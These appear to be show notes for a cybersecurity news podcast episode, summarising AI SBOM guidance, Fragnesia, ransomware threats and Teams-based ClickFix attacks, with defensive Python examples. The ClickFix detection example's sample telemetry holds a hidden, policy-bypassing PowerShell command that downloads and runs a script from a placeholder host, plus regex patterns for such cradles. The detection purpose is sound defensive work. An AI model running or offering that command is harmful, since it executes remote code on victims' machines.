May 15, 2026
Episode show notes
May 15's Top Cyber News NOW! - Ep 1133
At a glance
G7 nations released software bill of materials guidance for AI systems; Dell's support software is crashing Windows systems; a Linux kernel patch has spawned a dangerous successor flaw; ransomware operators are now making physical threats against employees and their families; and AI-driven vulnerability discovery is outpacing defenders' ability to patch, creating a dangerous patch-and-exploit cycle.
Stories covered
What's the G7 releasing for AI software transparency?
What happened: The G7 (US, Canada, Japan, Germany, France, Italy, UK) plus the EU published software bill of materials guidance specifically for AI systems. An SBOM is a machine-readable manifest cataloging every component, library, and dependency in software, similar to nutrition labels on food products.
Why it matters: SBOMs for AI expose what's actually baked into your LLMs and AI tools—critical for tracking vulnerabilities and supply chain risks. The Log4j incident in 2021 proved how dangerous it is when organizations don't know what software they're running. Standardization signals convergence; we're moving out of the wild west toward coherent best practice.
What to do: If you're evaluating or deploying AI tools, start asking vendors for SBOMs. An SBOM is an awareness control, not a defensive one: it tells you what you're actually running, but you still have to match it against advisories and act on the result.
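The matching step is where an SBOM earns its keep. The following is an added example written for these notes, not code from the G7 guidance or any vendor: it parses a constructed CycloneDX-style SBOM (CycloneDX 1.5 added a machine-learning-model component type, so models can be inventoried next to libraries), counts what is in it, and flags components that sit below a fixed version in a constructed advisory list. The package names, versions and fixed versions are illustrative sample data, not an authoritative feed.

```python
"""Added example for these notes (not from the G7 guidance or any vendor):
check a vendor-supplied SBOM against an advisory list.

SBOM_JSON is a constructed CycloneDX-style document for a hypothetical AI
assistant service; ADVISORIES is constructed sample data (package names,
versions and fixed versions are illustrative, not an authoritative feed).
"""
import json
import re

SBOM_JSON = r'''
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "components": [
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
     "version": "2.14.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
    {"type": "library", "name": "requests", "version": "2.31.0",
     "purl": "pkg:pypi/requests@2.31.0"},
    {"type": "machine-learning-model", "name": "assistant-llm",
     "version": "7b-instruct-q4", "purl": "pkg:generic/assistant-llm@7b-instruct-q4"},
    {"type": "library", "name": "example-tokenizer", "version": "0.9.2",
     "purl": "pkg:pypi/example-tokenizer@0.9.2?arch=x86_64"}
  ]
}
'''

# Constructed advisory data: purl prefix (without version) -> first fixed version.
ADVISORIES = {
    "pkg:maven/org.apache.logging.log4j/log4j-core": "2.17.1",
    "pkg:pypi/example-tokenizer": "1.0.0",
}


def version_key(version):
    """Leading numeric fields of a version string as a comparable tuple.
    '2.14.1' -> (2, 14, 1); '7b-instruct-q4' -> (7,). Adequate for the simple
    ranges used here; use a real version library for production."""
    parts = []
    for piece in re.split(r"[.\-]", version):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def split_purl(purl):
    """Split 'pkg:type/ns/name@version?qualifiers#subpath' into (prefix, version)."""
    prefix, _, rest = purl.partition("@")
    version = rest.split("?", 1)[0].split("#", 1)[0]
    return prefix, version


def inventory_by_type(sbom_json):
    """Count components per type so models and data show up, not just libraries."""
    counts = {}
    for comp in json.loads(sbom_json).get("components", []):
        ctype = comp.get("type", "unknown")
        counts[ctype] = counts.get(ctype, 0) + 1
    return counts


def find_vulnerable(sbom_json, advisories):
    """Return components whose version is below the advisory's fixed version."""
    hits = []
    for comp in json.loads(sbom_json).get("components", []):
        purl = comp.get("purl")
        if not purl:
            continue  # no purl: cannot be matched automatically, route to manual review
        prefix, version = split_purl(purl)
        fixed = advisories.get(prefix)
        if fixed and version_key(version) < version_key(fixed):
            hits.append({"name": comp["name"], "type": comp["type"],
                         "version": version, "fixed_in": fixed})
    return hits


if __name__ == "__main__":
    print(inventory_by_type(SBOM_JSON))
    for hit in find_vulnerable(SBOM_JSON, ADVISORIES):
        print(f"{hit['type']} {hit['name']} {hit['version']} -> upgrade to {hit['fixed_in']}")
```

Components without a purl (common for model weights and datasets) are the ones that matter most for AI SBOMs and the ones this kind of automation cannot match; they need a manual review queue rather than silent skipping.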
---
Is Dell's support software causing widespread Windows crashes?
What happened: Dell confirmed that SupportAssist Remediation Service version 5.5.16.0 is causing blue screen of death crashes on Windows systems. The workaround is to disable or uninstall the service.
Why it matters: A vendor-supplied system tool causing denial of service on endpoints is a visibility and operations problem for SOCs. End users can't work. If you're a Dell shop, your help desk is going to get slammed with BSOD tickets if you haven't addressed this.
What to do: If you run Dell endpoints, share this alert with your help desk and endpoint management team. Consider scripting removal via PowerShell or group policy rather than having users manually uninstall. If you're not using SupportAssist, remove it to reduce attack surface.
---
Why is a Linux kernel vulnerability coming back as Fragnesia?
What happened: A new Linux kernel local privilege escalation flaw called Fragnesia has been discovered. It emerged as an unintended side effect of patches shipped to fix the original Dirty Frag vulnerability—researchers found the patch itself introduced a new exploitable gap.
Why it matters: This illustrates a dangerous cycle: threat actors can analyze patches in real time to discover new flaws introduced by the fix. Combined with AI-accelerated vulnerability discovery, we're entering a doom loop of patch-analyze-exploit-patch. If you run Linux servers, you're in scope.
What to do: Patch immediately. Track Dirty Frag, CopyFail, and now Fragnesia in your Linux vulnerability management workflow, and note that hosts already patched for Dirty Frag still need the Fragnesia fix. Expect this pattern to continue for the next 3–5 years as AI surfaces decades of dormant bugs and patches introduce new ones.
---
Are ransomware gangs now threatening physical harm to employees?
What happened: According to security firm S-Paris, 40% of global ransomware attacks in 2025 included threats of physical violence against employees and their families. In the US, this number rises to 46%. Attackers use stolen PII—home addresses, SSNs—to call individuals directly. Some threaten machinery sabotage (robots, conveyor belts) to demonstrate control and coerce payment.
Why it matters: This is no longer just a data breach or financial threat; it's personal terrorism. Social engineering escalates from phishing to extortion. The FBI reports most perpetrators are between 17–25 years old, recruited or employed by financially motivated criminal gangs. Gig economy workers are being paid $1,000 to deliver printed threats to homes.
What to do: Educate employees that data breaches will result in this type of outreach and that they should report it immediately to law enforcement and your incident response team. Standard identity theft protection won't help; this isn't identity theft, it's weaponized exposure. Assume all PII is compromised and plan for contact campaigns.
---
Is the UK rewriting its cyber crime law?
What happened: The British government announced plans to rewrite the Computer Misuse Act of 1990 to shield security researchers. The 36-year-old law creates legal uncertainty around legitimate activities like vulnerability research, penetration testing, and threat intelligence operations because it predates cloud computing, ransomware, and modern offensive security.
Why it matters: Researchers and bug bounty programs have long faced legal ambiguity in the UK. The US established safe harbor through responsible disclosure and formal bug bounty programs; the UK is now following suit. This removes friction for coordinated vulnerability research and industry-led threat intelligence.
What to do: If you work in UK-regulated sectors or partner with UK researchers, monitor this legislative update. Expect clearer legal protections for authorized security testing once this passes.
---
How many vulnerabilities is Microsoft on pace to patch this year?
What happened: Microsoft issued patches for 130+ vulnerabilities on Patch Tuesday and has already patched 500+ in 2026. The company is on pace to break its annual record. Representatives acknowledge that AI tools are driving surge in vulnerability discovery across the industry and expect releases to trend larger.
Why it matters: This is concrete evidence of AI-accelerated vulnerability discovery. NIST has already stated it cannot enrich all reported vulnerabilities due to sheer volume. Expect rapid growth in vulnerability counts through 2026 and 2027 as AI works through 25 years of unreviewed code.
What to do: Patch velocity is going to become your biggest operational challenge. If you're not automating patch testing and deployment, start now. Prioritize on exploitability signals (known exploitation in the wild, public exploit code, predicted exploitation likelihood, exposure of the affected asset) rather than CVSS score alone or trying to patch everything at once. Plan for 600+ patches from major vendors annually.
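What exploitability-based prioritization looks like in practice, as an added example written for these notes (not vendor tooling): a small backlog ranked by active-exploitation and exposure signals, with CVSS used only as a tie-breaker. The backlog entries are constructed with placeholder ids, not real CVEs, and the weights and SLA bands are assumptions you would tune to your own risk appetite.

```python
"""Added example for these notes: rank a patch backlog by exploitability signals.
Constructed data with placeholder ids (not real CVEs); weights and SLA bands
are assumptions, not a published standard.
"""

# Constructed backlog. epss: estimated probability of exploitation in the next
# 30 days (0..1); in_kev: listed in CISA's Known Exploited Vulnerabilities catalog;
# exploit_public: working exploit code is public; internet_facing: affected asset
# is reachable from the internet.
BACKLOG = [
    {"id": "vuln-1", "cvss": 9.8, "epss": 0.02, "in_kev": False, "exploit_public": False, "internet_facing": False},
    {"id": "vuln-2", "cvss": 7.5, "epss": 0.93, "in_kev": True,  "exploit_public": True,  "internet_facing": True},
    {"id": "vuln-3", "cvss": 8.1, "epss": 0.45, "in_kev": False, "exploit_public": True,  "internet_facing": True},
    {"id": "vuln-4", "cvss": 5.3, "epss": 0.01, "in_kev": False, "exploit_public": False, "internet_facing": False},
]


def priority_score(v):
    """Assumed weighting: confirmed exploitation and exposure dominate,
    predicted exploitation scales, and CVSS (0..10) only breaks ties."""
    score = 0.0
    if v["in_kev"]:
        score += 50
    if v["exploit_public"]:
        score += 20
    score += 25 * v["epss"]
    if v["internet_facing"]:
        score += 15
    score += v["cvss"]
    return round(score, 2)


def sla_days(score):
    """Assumed remediation SLA bands keyed on the score."""
    if score >= 60:
        return 2
    if score >= 30:
        return 14
    return 30


def rank(backlog):
    """Backlog ordered for remediation, highest priority first."""
    scored = [(priority_score(v), v) for v in backlog]
    scored.sort(key=lambda pair: pair[0], reverse=True)
    return [{"id": v["id"], "score": s, "sla_days": sla_days(s)} for s, v in scored]


def cvss_only_order(backlog):
    """The order a CVSS-only policy would produce, for comparison."""
    return [v["id"] for v in sorted(backlog, key=lambda v: v["cvss"], reverse=True)]


if __name__ == "__main__":
    for row in rank(BACKLOG):
        print(f"{row['id']}: score={row['score']:.2f} patch within {row['sla_days']} days")
    print("CVSS-only order would be:", cvss_only_order(BACKLOG))
```

Note how the CVSS 9.8 item that nobody is exploiting drops to third, behind two lower-scored bugs that are being exploited against exposed assets; that reordering is the whole point of the exercise.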
---
Are attackers using Microsoft Teams to breach corporate networks?
What happened: Initial access broker Kong Tuki is using Microsoft Teams to impersonate IT and help desk staff, tricking employees into pasting PowerShell commands that deliver remote access trojans. Attackers gain persistent access in as little as 5 minutes using ClickFix-style lures (fake CAPTCHA or "verification" prompts that tell the user to paste a command into the Run dialog). Once inside, they register their own device as an additional MFA method on the compromised account, so later sign-ins pass MFA without the victim's involvement.
Why it matters: Teams is ubiquitous and trusted; impersonation is trivial. ClickFix activity had quieted for months but is clearly resurging. Once attackers hold a legitimate user account and have registered their own MFA device, they own that user; ransomware operators then buy that access and deploy file encryption.
What to do: Deploy awareness training immediately: IT will never ask you to run PowerShell via chat. Require out-of-band verification for any help desk request. Restrict PowerShell for non-privileged users where possible (Constrained Language Mode, AppLocker or WDAC) and turn on script block logging. Monitor for PowerShell processes making outbound connections to file-sharing and paste services (Dropbox, etc.). Alert on new MFA method or device registrations, especially minutes after a sign-in from an unfamiliar location. Treat intra-Teams impersonation as a persistent threat.
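The three monitoring points above (ClickFix-style PowerShell command lines, PowerShell reaching file-sharing domains, and MFA registration shortly afterwards) are stronger together than apart. The following is an added example written for these notes, not the broker's tooling or any product's detection content: it correlates the chain per user over constructed sample telemetry in a simplified Sysmon/Entra-like shape. The field names, the domain watchlist, the 30-minute window, the three-indicator threshold, and all hosts, domains and IPs (RFC 2606 and RFC 5737 ranges) are assumptions.

```python
"""Added example for these notes (not vendor or attacker code): correlate a
ClickFix-style PowerShell launch, an outbound connection to a payload host and
a follow-on MFA registration for the same user.

EVENTS is constructed telemetry; field names, watchlist, window and threshold
are assumptions.
"""
import re
from datetime import datetime, timedelta

EVENTS = [
    {"ts": "2026-05-14T09:01:10Z", "type": "process", "user": "CORP\\jdoe", "host": "WS-042",
     "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (iwr https://files.example.net/verify.ps1)"'},
    {"ts": "2026-05-14T09:01:12Z", "type": "network", "user": "CORP\\jdoe", "host": "WS-042",
     "image": "powershell.exe", "dest": "files.example.net"},
    {"ts": "2026-05-14T09:05:40Z", "type": "mfa_register", "user": "jdoe@corp.example",
     "ip": "203.0.113.7", "method": "authenticator-app"},
    {"ts": "2026-05-14T10:30:00Z", "type": "process", "user": "CORP\\asmith", "host": "WS-017",
     "parent": "code.exe", "image": "powershell.exe", "cmdline": "powershell -File build.ps1"},
    {"ts": "2026-05-14T11:00:00Z", "type": "mfa_register", "user": "asmith@corp.example",
     "ip": "198.51.100.20", "method": "authenticator-app"},
]

# Assumed watchlist of file-sharing / paste / hosting domains used to stage payloads.
WATCHLIST_DOMAINS = {"dropbox.com", "pastebin.com", "files.example.net"}
# Parent processes consistent with a user pasting into the Run dialog (Win+R).
USER_INTERACTIVE_PARENTS = {"explorer.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line traits typical of a pasted ClickFix cradle.
CMDLINE_INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "download_cradle": re.compile(r"(iwr|invoke-webrequest|downloadstring|curl\s)", re.I),
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def normalize_user(u):
    """Map 'CORP\\jdoe' (endpoint telemetry) and 'jdoe@corp.example' (identity logs) to 'jdoe'."""
    return u.split("\\")[-1].split("@")[0].lower()


def on_watchlist(dest):
    dest = dest.lower()
    return any(dest == d or dest.endswith("." + d) for d in WATCHLIST_DOMAINS)


def clickfix_indicators(event):
    """Names of the ClickFix traits present on a PowerShell process-creation event."""
    if event["type"] != "process" or event["image"].lower() not in POWERSHELL_IMAGES:
        return []
    hits = [name for name, rx in CMDLINE_INDICATORS.items() if rx.search(event["cmdline"])]
    if event["parent"].lower() in USER_INTERACTIVE_PARENTS:
        hits.append("spawned_from_explorer")
    return hits


def correlate(events, window=timedelta(minutes=30), min_indicators=3):
    """One alert per user whose activity matches the ClickFix -> payload host -> MFA chain."""
    by_user = {}
    for ev in sorted(events, key=lambda e: parse_ts(e["ts"])):
        key = normalize_user(ev["user"])
        state = by_user.setdefault(key, {"user": key, "reasons": [], "clickfix_at": None})
        indicators = clickfix_indicators(ev)
        if len(indicators) >= min_indicators:
            state["clickfix_at"] = parse_ts(ev["ts"])
            state["reasons"].append("clickfix_cmdline:" + ",".join(indicators))
        elif (ev["type"] == "network" and ev["image"].lower() in POWERSHELL_IMAGES
              and on_watchlist(ev["dest"])):
            state["reasons"].append("powershell_to_watchlist_domain:" + ev["dest"])
        elif (ev["type"] == "mfa_register" and state["clickfix_at"]
              and parse_ts(ev["ts"]) - state["clickfix_at"] <= window):
            state["reasons"].append("mfa_registration_after_clickfix:" + ev["ip"])
    return [s for s in by_user.values() if s["reasons"]]


if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert["user"], "->", "; ".join(alert["reasons"]))
```

The developer who ran a build script from an editor and later enrolled a new phone produces no alert, which is the false-positive case you need to get right before this goes to the SOC queue; the MFA registration only counts when it follows a matching PowerShell launch for the same normalized user inside the window.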
---
Can AI hallucinations compromise security operations?
What happened: The Artificial Analysis omniscience benchmark tested 40 AI models and found 36 were more likely to provide confident incorrect answers than correct ones on difficult questions. Most models have no reliable mechanism to recognize their own uncertainty and instead generate the most probable response from training-data patterns.
Why it matters: As AI assumes larger roles in SOC triage, threat intelligence, and infrastructure decision-making, hallucinated answers can look authoritative. Organizations risk treating false conclusions as fact and making security decisions based on fabricated data.
What to do: Never treat AI output as ground truth. Verify all critical findings with human review and reference material. Use purpose-built AI models for specific domains rather than general LLMs for specialized security questions. Establish confidence-level scoring for AI recommendations and escalate low-confidence outputs. Don't replace analysts with AI; use AI to augment analyst capability and speed up routine work.
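One concrete way to operationalize "never treat AI output as ground truth" in a triage pipeline is to refuse any verdict whose cited indicators cannot be found in the raw evidence the model was given. The following is an added example written for these notes, not code from the benchmark or any SOC product: the evidence lines and the model's JSON output are constructed (one cited IP is deliberately fabricated), and the thresholds are assumptions.

```python
"""Added example for these notes: a verification gate for AI-generated triage.
Not from the benchmark or any product. EVIDENCE and MODEL_OUTPUT are constructed;
the thresholds are assumptions.
"""
import re

# Constructed raw evidence the model was given for one alert.
EVIDENCE = [
    "2026-05-14T09:01:10Z host=WS-042 user=jdoe proc=powershell.exe parent=explorer.exe "
    "cmd='iex (iwr https://files.example.net/verify.ps1)'",
    "2026-05-14T09:01:12Z host=WS-042 proc=powershell.exe net_dst=files.example.net:443",
    "2026-05-14T09:05:40Z entra user=jdoe@corp.example event=mfa_method_added ip=203.0.113.7",
]

# Constructed model output: verdict, self-reported confidence, and the indicators it
# claims to have seen. The third indicator (198.51.100.99) appears nowhere in EVIDENCE.
MODEL_OUTPUT = {
    "verdict": "true_positive",
    "confidence": 0.92,
    "evidence": [
        {"indicator": "files.example.net", "claim": "PowerShell fetched a script from files.example.net"},
        {"indicator": "203.0.113.7", "claim": "MFA method added from 203.0.113.7"},
        {"indicator": "198.51.100.99", "claim": "Follow-on beacon to 198.51.100.99"},
    ],
}


def indicator_present(indicator, evidence):
    """An indicator is verified only if it appears literally in the raw evidence."""
    rx = re.compile(re.escape(indicator), re.I)
    return any(rx.search(line) for line in evidence)


def gate(output, evidence, min_confidence=0.8, min_verified_ratio=1.0):
    """Accept the verdict only if self-reported confidence clears the bar AND every
    cited indicator is grounded in the evidence; otherwise escalate to an analyst."""
    verified, unverified = [], []
    for item in output.get("evidence", []):
        (verified if indicator_present(item["indicator"], evidence) else unverified).append(item)
    total = len(verified) + len(unverified)
    ratio = len(verified) / total if total else 0.0
    reasons = []
    if output.get("confidence", 0.0) < min_confidence:
        reasons.append("low_self_reported_confidence")
    if total == 0:
        reasons.append("no_cited_evidence")
    elif ratio < min_verified_ratio:
        reasons.append("unverified_indicators:" + ",".join(i["indicator"] for i in unverified))
    return {"decision": "escalate" if reasons else "accept",
            "verified_ratio": ratio, "reasons": reasons}


if __name__ == "__main__":
    print(gate(MODEL_OUTPUT, EVIDENCE))
```

The model's own 0.92 confidence is treated as necessary but never sufficient: a fabricated indicator sends the case to a human regardless of how sure the model says it is, which is the failure mode the benchmark describes.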
---
Key takeaways
- Patch velocity is your new enemy: Microsoft alone has already patched 500+ vulnerabilities in 2026 and is on pace for a record year; expect rapid growth as AI discovers decades of dormant vulnerabilities. Automation and exploitability-based prioritization are now mandatory.
- Threat actors are escalating from digital to physical: 40%+ of ransomware campaigns now include direct threats to employee homes and families. This is weaponized exposure, not identity theft, and awareness training must reflect this reality.
- Patch cycles create new holes: the fix for Dirty Frag spawned Fragnesia. Threat actors analyze patches in real time to find new exploits. Expect this to be the norm for 3–5 years.
- Teams-based social engineering is resurging: ClickFix attacks impersonating IT are gaining traction again. Out-of-band verification and PowerShell controls are your fastest mitigations.
- AI outputs are vulnerabilities until verified: 36 of 40 AI models tested were more likely to hallucinate confidently than answer correctly on hard questions. Treat every AI finding as unverified until human review confirms it.
---
Want the live experience? The Daily Cyber Threat Brief airs live every weekday at 5am PT / 8am ET on YouTube. 400+ practitioners join the chat in real time.